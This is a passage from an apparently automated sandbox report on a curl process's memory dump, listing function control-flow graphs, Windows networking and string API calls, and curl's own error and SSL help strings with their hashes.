                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ioctlsocket
                                                                                                                                                                    • String ID: [%lu/%lu]: %s --> %s$%s%c%s$%s%s$%s%s$(%d) Failed writing body$--_curl_--$://$<stdout>$?$If this HTTPS server uses a certificate signed by a CA represented in the bundle, the certificate verification probably failed due to a problem with the certificate (it might be expired, or the name might not match the domain name in the URL).If you'd like$More details here: http://curl.haxx.se/docs/sslcerts.htmlcurl performs SSL certificate verification by default, using a "bundle" of Certificate Authority (CA) public keys (CA certs). If the default bundle file isn't adequate, you can specify an alternate f$Using --anyauth or --proxy-anyauth with upload from stdin involves a big risk of it not working. Use a temporary file or a fixed auth type instead!$curl: (%d) %s$fcntl failed on fd=%d: %s$http://$https://$out of memory$-N$Uh
                                                                                                                                                                    • API String ID: 3577187118-4169914100
                                                                                                                                                                    • Opcode ID: 8f34be4879c022461088617ef7e2460c507d866c0f4ccb90384bb7719697d4a9
                                                                                                                                                                    • Instruction ID: 59da64da0441704befe5ef03d8ce788633a4c0c84daf63a1c104091ab9c7f147
                                                                                                                                                                    • Opcode Fuzzy Hash: 8f34be4879c022461088617ef7e2460c507d866c0f4ccb90384bb7719697d4a9
                                                                                                                                                                    • Instruction Fuzzy Hash: 64C1D6B0A083419BEB249F648886F6F77E5AFB5344F14492CF889C6292EB71DD44CB53
                                                                                                                                                                    Function 00241FF0 Relevance: 18.2, APIs: 7, Strings: 5, Instructions: 169COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 650 241ff0-24200c 651 242010-242015 650->651 651->651 652 242017-24203d MultiByteToWideChar 651->652 653 24203f-24204a GetLastError 652->653 654 24207b-2420a0 call 2d0a00 MultiByteToWideChar 652->654 655 24204c-24206c MultiByteToWideChar 653->655 656 24206e-242079 GetLastError 653->656 660 24214f-24219b GetLastError call 212b50 call 213250 call 2be62a 654->660 662 2420a6-2420ab 654->662 655->654 655->656 658 2420f8 656->658 658->660 661 2420fa-2420fc call 2c0dc6 658->661 685 24219d-2421ac 660->685 686 2421ae-2421b8 660->686 667 242101-242108 661->667 665 2420b0-2420b5 662->665 665->665 668 2420b7-2420cf MultiByteToWideChar 665->668 667->660 670 24210a-242119 call 217900 667->670 668->660 671 2420d1-2420d8 call 2c48cd 668->671 680 242128-24214e call 217ed0 call 2be5e7 670->680 681 24211b-242123 call 2c0e47 670->681 675 2420dd-2420e4 671->675 675->670 678 2420e6-2420ee call 2be62a 675->678 678->661 693 2420f0-2420f5 call 2be62a 678->693 692 2421c2-2421d7 call 2be5e7 681->692 688 2421ba-2421bf call 212b50 685->688 686->688 688->692 693->658
                                                                                                                                                                    APIs
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,00000000,00000000,?,?), ref: 00242033
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?,?), ref: 0024203F
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000,00000000,00000000,?,?), ref: 00242062
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?,?), ref: 0024206E
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000,00000000,00000000,?,?), ref: 0024209C
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00365F2C,00365F2E,?,00000008,?,?,?,00000000,?,?,00000000,00000000,00000000,?), ref: 002420CB
                                                                                                                                                                    • GetLastError.KERNEL32(..\..\openssl\openssl\crypto\bio\bss_file.c,000000A9,?,?,?,00000000,?,?,00000000,00000000,00000000,?,?), ref: 00242159
                                                                                                                                                                    Strings
                                                                                                                                                                    • ',', xrefs: 00242176
                                                                                                                                                                    • ..\..\openssl\openssl\crypto\bio\bss_file.c, xrefs: 002421B3
                                                                                                                                                                    • ..\..\openssl\openssl\crypto\bio\bss_file.c, xrefs: 00242154
                                                                                                                                                                    • ..\..\openssl\openssl\crypto\bio\bss_file.c, xrefs: 002421A2
                                                                                                                                                                    • fopen(', xrefs: 0024217C
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                    • String ID: ','$..\..\openssl\openssl\crypto\bio\bss_file.c$..\..\openssl\openssl\crypto\bio\bss_file.c$..\..\openssl\openssl\crypto\bio\bss_file.c$fopen('
                                                                                                                                                                    • API String ID: 1717984340-946823011
                                                                                                                                                                    • Opcode ID: e72ea9a3aa175649dd282ce48f4f52ec916630be6826bc0c19e6cdf0caf9e572
                                                                                                                                                                    • Instruction ID: 99125eb90eb5ae9c14565d7e4170ffde27dda065d97f49296e6f4de2e97106d2
                                                                                                                                                                    • Opcode Fuzzy Hash: e72ea9a3aa175649dd282ce48f4f52ec916630be6826bc0c19e6cdf0caf9e572
                                                                                                                                                                    • Instruction Fuzzy Hash: 27513C31E50206EBDB356F51DC42FFF77A9EF54700F050125FD09AB181DA615D29CAA1
                                                                                                                                                                    Function 001DD7C0 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 151networkCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                    • getpeername.WS2_32(?,?,?), ref: 001DD80D
                                                                                                                                                                    • WSAGetLastError.WS2_32 ref: 001DD817
                                                                                                                                                                      • Part of subcall function 001D23B0: GetLastError.KERNEL32(?,00000000,?,001DD974), ref: 001D23B7
                                                                                                                                                                      • Part of subcall function 001D23B0: GetLastError.KERNEL32(?,?,?,?,001DD974), ref: 001D246B
                                                                                                                                                                      • Part of subcall function 001D23B0: SetLastError.KERNEL32(00000000,?,?,?,?,001DD974), ref: 001D2476
                                                                                                                                                                    • getsockname.WS2_32(?,?,?), ref: 001DD877
                                                                                                                                                                    • WSAGetLastError.WS2_32 ref: 001DD881
                                                                                                                                                                    Strings
                                                                                                                                                                    • ssloc inet_ntop() failed with errno %d: %s, xrefs: 001DD976
                                                                                                                                                                    • getpeername() failed with errno %d: %s, xrefs: 001DD82A
                                                                                                                                                                    • getsockname() failed with errno %d: %s, xrefs: 001DD894
                                                                                                                                                                    • ssrem inet_ntop() failed with errno %d: %s, xrefs: 001DD8EF
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$getpeernamegetsockname
                                                                                                                                                                    • String ID: getpeername() failed with errno %d: %s$getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s$ssrem inet_ntop() failed with errno %d: %s
                                                                                                                                                                    • API String ID: 1444953621-670633250
                                                                                                                                                                    • Opcode ID: 5736d1ca1082f465f1fdd3187b2c91e9cdac76f45acf6e1e84c4a8fa539ed0e7
                                                                                                                                                                    • Instruction ID: f87349124e5e02e43cfc9571bf275542359281196f6da7e91fec307f2f35fbd6
                                                                                                                                                                    • Opcode Fuzzy Hash: 5736d1ca1082f465f1fdd3187b2c91e9cdac76f45acf6e1e84c4a8fa539ed0e7
                                                                                                                                                                    • Instruction Fuzzy Hash: F441E972A006016BD724AB34EC42BEFB398FF98310F40451BF99993342EF75A955C792
                                                                                                                                                                    Function 001CD790 Relevance: 16.2, APIs: 1, Strings: 8, Instructions: 414COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 746 1cd790-1cd7bd 747 1cd7bf-1cd7c2 746->747 748 1cd7c8-1cd7da call 1cba00 746->748 747->748 750 1cd8b5-1cd8bc 747->750 748->750 755 1cd7e0-1cd7e2 748->755 751 1cd8c0-1cd8c4 750->751 753 1cd8c6-1cd8c8 751->753 754 1cd8e0-1cd8e2 751->754 756 1cd8dc-1cd8de 753->756 757 1cd8ca-1cd8d0 753->757 758 1cd8e5-1cd8e7 754->758 759 1cd7e5-1cd7ea 755->759 756->758 757->754 760 1cd8d2-1cd8da 757->760 762 1cd8ff-1cd906 call 2bfa48 758->762 763 1cd8e9-1cd8ef call 2c0dc6 758->763 759->759 761 1cd7ec-1cd7f4 759->761 760->751 760->756 765 1cd8ac-1cd8b2 call 2be832 761->765 766 1cd7fa-1cd823 call 1cf6a0 call 2c0dc6 761->766 772 1cd90a-1cd90c 762->772 769 1cd8f4-1cd8fd 763->769 765->750 780 1cd828-1cd82d 766->780 769->772 776 1cdc4b 772->776 777 1cd912-1cd91f call 1cddc0 772->777 779 1cdc50-1cdc68 call 2be5e7 776->779 787 1cd925-1cd931 777->787 788 1cdc33 777->788 783 1cd82f-1cd838 call 2c0e47 780->783 784 1cd83a-1cd852 GetModuleFileNameA 780->784 796 1cd8a4-1cd8a8 783->796 784->765 786 1cd854-1cd867 call 2c0690 784->786 786->765 803 1cd869-1cd870 786->803 791 1cd949-1cd951 787->791 792 1cd933-1cd941 call 2bf2ff 787->792 794 1cdc35-1cdc3c call 2bfa48 788->794 799 1cd96c-1cd978 791->799 800 1cd953-1cd95a 791->800 792->791 810 1cd943-1cd947 792->810 807 1cdc3e-1cdc3f call 2c0e47 794->807 808 1cdc47-1cdc49 794->808 796->765 805 1cd97a 799->805 806 1cd9a6-1cd9a9 799->806 800->799 804 1cd961-1cd967 call 2be832 800->804 809 1cd873-1cd878 803->809 827 1cdc06-1cdc14 call 1cddc0 804->827 814 1cd980-1cd98e call 2bf2ff 805->814 811 1cd9af-1cd9b3 806->811 812 1cd9ab-1cd9ae 806->812 824 1cdc44 807->824 808->779 809->809 816 1cd87a-1cd889 809->816 810->791 810->792 817 1cd9db-1cd9df 811->817 818 1cd9b5-1cd9c3 call 2bf2ff 811->818 812->811 814->806 829 1cd990-1cd992 814->829 816->765 825 1cd88b-1cd8a1 call 1cf6a0 816->825 821 1cda74-1cda78 817->821 822 1cd9e5-1cd9eb 817->822 843 1cd9c5-1cd9c7 818->843 844 1cd9d3-1cd9d9 818->844 830 1cda98-1cdaa0 821->830 831 1cda7a 821->831 828 1cd9f0-1cd9f5 822->828 824->808 825->796 827->788 850 1cdc16-1cdc1a 827->850 828->828 835 1cd9f7-1cda09 call 2bfd90 828->835 836 1cd99e-1cd9a4 829->836 837 1cd994-1cd998 829->837 840 1cdaba-1cdac0 830->840 841 1cdaa2-1cdab0 call 2bf2ff 830->841 838 1cda80-1cda8e call 2bf2ff 831->838 860 1cdc1f-1cdc31 call 2be832 835->860 861 1cda0f-1cda16 call 1cdcd0 835->861 836->806 836->814 837->806 848 1cd99a-1cd99c 837->848 838->830 862 1cda90-1cda96 838->862 845 1cdad0-1cdaef call 1c1a10 840->845 846 1cdac2-1cdac9 840->846 841->840 864 1cdab2-1cdab8 841->864 843->817 852 1cd9c9-1cd9cd 843->852 844->817 844->818 863 1cda1f-1cda22 845->863 846->845 853 1cda1b 846->853 848->806 848->836 850->787 852->844 858 1cd9cf-1cd9d1 852->858 853->863 858->817 858->844 860->794 861->853 862->830 862->838 866 1cda24-1cda26 863->866 867 1cda33-1cda50 call 1c5af0 863->867 864->840 864->841 869 1cda28-1cda2e call 2be832 866->869 870 1cda31 866->870 875 1cdaf4-1cdaf7 867->875 876 1cda56-1cda59 867->876 869->870 870->867 879 1cdaf9-1cdb05 875->879 880 1cdb6a-1cdb6c 875->880 876->875 878 1cda5f-1cda64 876->878 878->875 881 1cda6a-1cda6f 878->881 882 1cdbeb-1cdbed 879->882 883 1cdb0b-1cdb0f 879->883 880->882 884 1cdb72-1cdb7b 880->884 881->884 885 1cdbfc-1cdc02 call 2be832 882->885 886 1cdbef-1cdbf1 882->886 883->882 888 1cdb15-1cdb2c call 2bfd90 883->888 887 1cdb80-1cdb84 884->887 885->827 886->885 889 1cdbf3-1cdbf9 call 2be832 886->889 890 1cdb86-1cdb88 887->890 891 1cdba0-1cdba2 887->891 903 1cdb2e-1cdb5e call 1c2d10 888->903 904 1cdb63-1cdb68 888->904 889->885 895 1cdb9c-1cdb9e 890->895 896 1cdb8a-1cdb90 890->896 897 1cdba5-1cdbb8 891->897 895->897 896->891 901 1cdb92-1cdb9a 896->901 897->882 902 1cdbba-1cdbbd 897->902 901->887 901->895 902->882 905 1cdbbf-1cdbc2 902->905 903->882 904->884 905->882 907 1cdbc4-1cdbc7 905->907 907->882 909 1cdbc9-1cdbe8 call 1c5340 call 1c1a10 907->909 909->882
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000200), ref: 001CD846
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileModuleName
                                                                                                                                                                    • String ID: %s%s$%s%s%s$%s:%d: warning: '%s' %s$%s:%d: warning: '%s' uses unquoted white space in the line that may cause side-effects!$<stdin>$_curlrc$_curlrc$_curlrc
                                                                                                                                                                    • API String ID: 514040917-760928855
                                                                                                                                                                    • Opcode ID: bd12797431fd43b47e74182dbd0d286c2c0bf96c5bdceec1b66bbb23fd141255
                                                                                                                                                                    • Instruction ID: 0fa89dc359942922f6ad24e73365cb9b5313626c3fac6e236f98364bbacf4d7c
                                                                                                                                                                    • Opcode Fuzzy Hash: bd12797431fd43b47e74182dbd0d286c2c0bf96c5bdceec1b66bbb23fd141255
                                                                                                                                                                    • Instruction Fuzzy Hash: BFD156759083415BDB25AF24A881FBB7BD19FB6344F19047CE8CA47242EB36DC46CB92
                                                                                                                                                                    Function 001DDFB0 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 232networkCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 914 1ddfb0-1de003 call 1de580 917 1de009-1de011 914->917 918 1de2aa 914->918 919 1de030-1de03d call 208240 917->919 920 1de013-1de016 917->920 921 1de2ac-1de2c4 call 2be5e7 918->921 928 1de042-1de047 919->928 922 1de01c-1de02e call 2082e0 920->922 923 1de272-1de2a5 GetLastError call 1d23b0 call 1d3960 call 1de530 920->923 922->928 923->918 928->923 932 1de04d-1de074 htons call 1d3850 928->932 938 1de07b-1de080 932->938 939 1de076-1de079 932->939 940 1de089 938->940 941 1de082-1de087 938->941 939->938 939->940 942 1de08b-1de09a 940->942 941->942 943 1de09c-1de0a3 942->943 944 1de0ae-1de0ba call 1ddea0 942->944 943->944 945 1de0a5-1de0a9 call 1dde40 943->945 949 1de0bc-1de0c3 944->949 950 1de0ce-1de0d6 944->950 945->944 949->950 951 1de0c5-1de0c9 call 1dcf00 949->951 952 1de0d8-1de0ed 950->952 953 1de0f4-1de0fb 950->953 951->950 962 1de0ef 952->962 963 1de131-1de133 952->963 954 1de0fd-1de100 953->954 955 1de102-1de114 call 1dd110 953->955 954->955 957 1de148-1de19c ioctlsocket GetTickCount64 call 2ccc40 954->957 955->957 964 1de116-1de12c call 1de530 955->964 969 1de19e-1de1a6 call 1d6710 957->969 970 1de1ab-1de1b0 957->970 962->953 963->953 965 1de135-1de143 call 1de530 963->965 964->921 965->921 969->970 971 1de26a-1de270 970->971 972 1de1b6-1de1bd 970->972 971->918 972->971 976 1de1c3-1de1da connect 972->976 977 1de1dc-1de1e6 WSAGetLastError 976->977 978 1de1e8 976->978 979 1de1ec-1de1ff 977->979 978->979 980 1de25c-1de25e 979->980 981 1de201-1de204 979->981 982 1de266-1de268 980->982 983 1de260-1de264 980->983 984 1de206-1de20b 981->984 985 1de250-1de25a 981->985 982->921 983->982 986 1de20d-1de212 984->986 987 1de214-1de24e call 1d23b0 call 1d3850 call 1de530 984->987 985->921 986->985 986->987 987->921
                                                                                                                                                                    APIs
                                                                                                                                                                    • htons.WS2_32(?), ref: 001DE051
                                                                                                                                                                    • ioctlsocket.WS2_32(?,8004667E,?), ref: 001DE15B
                                                                                                                                                                    • GetTickCount64.KERNEL32 ref: 001DE161
                                                                                                                                                                    • connect.WS2_32(?,?,?), ref: 001DE1CD
                                                                                                                                                                    • WSAGetLastError.WS2_32 ref: 001DE1DC
                                                                                                                                                                      • Part of subcall function 001D6710: GetTickCount64.KERNEL32 ref: 001D671B
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 001DE27A
                                                                                                                                                                    Strings
                                                                                                                                                                    • Immediate connect fail for %s: %s, xrefs: 001DE226
                                                                                                                                                                    • Trying %s..., xrefs: 001DE05F
                                                                                                                                                                    • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 001DE291
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Count64ErrorLastTick$connecthtonsioctlsocket
                                                                                                                                                                    • String ID: Trying %s...$Immediate connect fail for %s: %s$sa_addr inet_ntop() failed with errno %d: %s
                                                                                                                                                                    • API String ID: 3234962113-3338264681
                                                                                                                                                                    • Opcode ID: fa24db7be5f98482a95f538109e36de63dc2017b0a0bd273c5ed7b94e3623ac5
                                                                                                                                                                    • Instruction ID: 743791760aec2ca9bb386b7d9c1e0fe176a2fee7f350f0db7a20b7eaccd38dbc
                                                                                                                                                                    • Opcode Fuzzy Hash: fa24db7be5f98482a95f538109e36de63dc2017b0a0bd273c5ed7b94e3623ac5
                                                                                                                                                                    • Instruction Fuzzy Hash: 3181CD707083419BD724AB28C885B6FB7D9AB94305F040A2EF8999B392DB74DD45CB92
                                                                                                                                                                    Function 002C8594 Relevance: 15.7, APIs: 10, Instructions: 665COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
